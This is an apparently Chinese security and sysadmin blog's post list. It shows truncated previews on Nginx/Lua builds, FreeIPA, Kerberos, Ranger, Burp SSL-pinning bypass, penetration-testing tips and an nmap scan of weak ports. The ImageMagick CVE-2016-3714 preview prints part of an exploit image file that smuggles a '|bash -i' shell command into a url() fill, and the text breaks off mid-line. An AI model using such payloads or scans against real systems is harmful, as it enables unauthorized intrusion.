原创 Nginx編譯安裝lua-nginx-module
注:轉載自https://www.cnblogs.com/52fhy/p/10164553.html lua-nginx-module 模塊可以將Lua的強大功能嵌入NGINX服務器。 下載Nginx源碼 如果已安裝Nginx,需要查看當
2020-06-21 22:58:59
6
原创 freeipa一次啓動失敗的解決
重啓機器後freeipa啓動失敗 執行ipactl start發現連接389端口time out 但是對應的ldap服務是開機啓動的,服務狀態也正常,看了下389是監聽在ipv6的,看起來是默認配置不支持ipv6導致 於是執行以下命令 s
2020-06-21 22:58:59
原创 對某大型企業的一次web漏洞挖掘過程
前段時間利用週末時間對某大廠做了一次web安全檢測,已經很久沒搞,但是自己近幾年沒有脫離業務,並且對業務的理解有進一步的加深,反而可以挖到按以前的思路可能挖不到的漏洞,所以將大概的思考過程記錄下來,因爲是有稿費的,所以這裏只貼上鍊接吧 對
2020-06-21 22:58:59
原创 kerberos常見錯誤及解決方法
oracle總結的還是比較全面的 https://docs.oracle.com/cd/E26926_01/html/E25889/trouble-2.html
2020-06-21 22:58:59
原创 freeipa證書相關的一些命令
ipa-getcert list #查看全部證書 ipa-cacert-manage renew #更新證書 ipa-getcert resubmit -i cert_nickname #cert_nickname自行替換,可由i
2020-06-21 22:58:52
原创 ImageMagick漏洞(cve-2016-3714)利用及修復
利用: 如下內容保存爲圖片格式上傳即可(命令部分自行替換) push graphic-context viewbox 0 0 640 480 fill 'url(https://example.com/image.jpg"|bash -i
2020-06-21 22:58:52
原创 【轉載】繞過ssl pining使用burp抓包微信小程序
參考了https://xz.aliyun.com/t/6102 不過文章裏是用的windows,我是用的mac 模擬器因爲Genymotion是付費的,所以我選擇了網易mumu,關於網易mumu如何使用adb連接以及配置代理可參考http
2020-06-21 22:18:32
1
原创 【轉載】敏感詞過濾實現-DFA
前段時間需要搞一個基於敏感詞過濾的腳本,最早搞過一個遍歷關鍵詞的,普通的用一下還行,像敏感詞詞庫動不動上萬的詞庫,這樣效率太多了,網上搜了一下,找到這麼一篇文章 python實現敏感詞過濾的幾種方法 最後選用了裏面的DFA算法,這裏記錄一
2020-06-02 00:24:09
原创 hive開啓ranger鑑權後set報錯的解決方案(阿里雲)
阿里雲emr集羣hive開啓ranger後執行set時報錯“java.lang.IllegalArgumentException: Cannot modify mapred.job.queue.name at runtime. It is
2020-05-20 10:29:36
原创 ranger對接ldap過程中遇到的一個坑
修改usersync的install.properties文件後,執行setup.sh setup.py文件存在一個bug,會修改hadoop-conf/core-site.xml文件權限及屬主,導致服務不可用。(詳見http://iss
2020-04-19 07:46:48
原创 安卓手機burp抓包小程序報錯的解決方案
由於需要root,所以搞了個之前不用的手機做測試機,過程還是比較繁瑣的,先要刷成開發版的miui系統獲取root,然後參考 https://www.freebuf.com/articles/network/160900.html
2020-04-19 07:46:48
原创 滲透中尋找突破口的那些事
注:之前發在烏雲drops的一篇文章,彙總了自己對滲透測試中尋找突破口的一些總結,現在烏雲drops沒有了,所以發在自己blog上。 一、尋找目標 在自己日常檢測中以及觀察他人檢測思路發現前期收集信息具有很關鍵的作用,很多時候不需要對
2020-03-17 09:48:14
原创 redhat使用163的yum源
注:redhat系統設置163yum源過程,今天搗鼓了下,網上很多文章上記錄的東西已經404了,記錄下,方便自己也方便大家 因爲需要卸載系統自帶的yum,此處先把後面裝yum的一些包下載下來 wget http://mirrors.16
2020-02-20 19:41:47
原创 cmd下傳文件方法記錄
注:以前寫在百度空間的,轉過來 某個web的命令執行,windows主機,不像linux下可以通過wget下個文件很方便,開始嘗試echo個vbs下載,如果直接在cmd下是沒問題的,但是web端執行發現只要有逗號就連同後面的內容一起沒
2020-02-20 19:41:33
原创 常見弱點端口掃描(限速)
./nmap -sT -sV -p 21,80,443,873,2601,2604,3128,4440,6082,6379,8000,8008,8080,8081,8090,8099,8088,8888,9000,9090,920
2020-02-20 19:41:33
1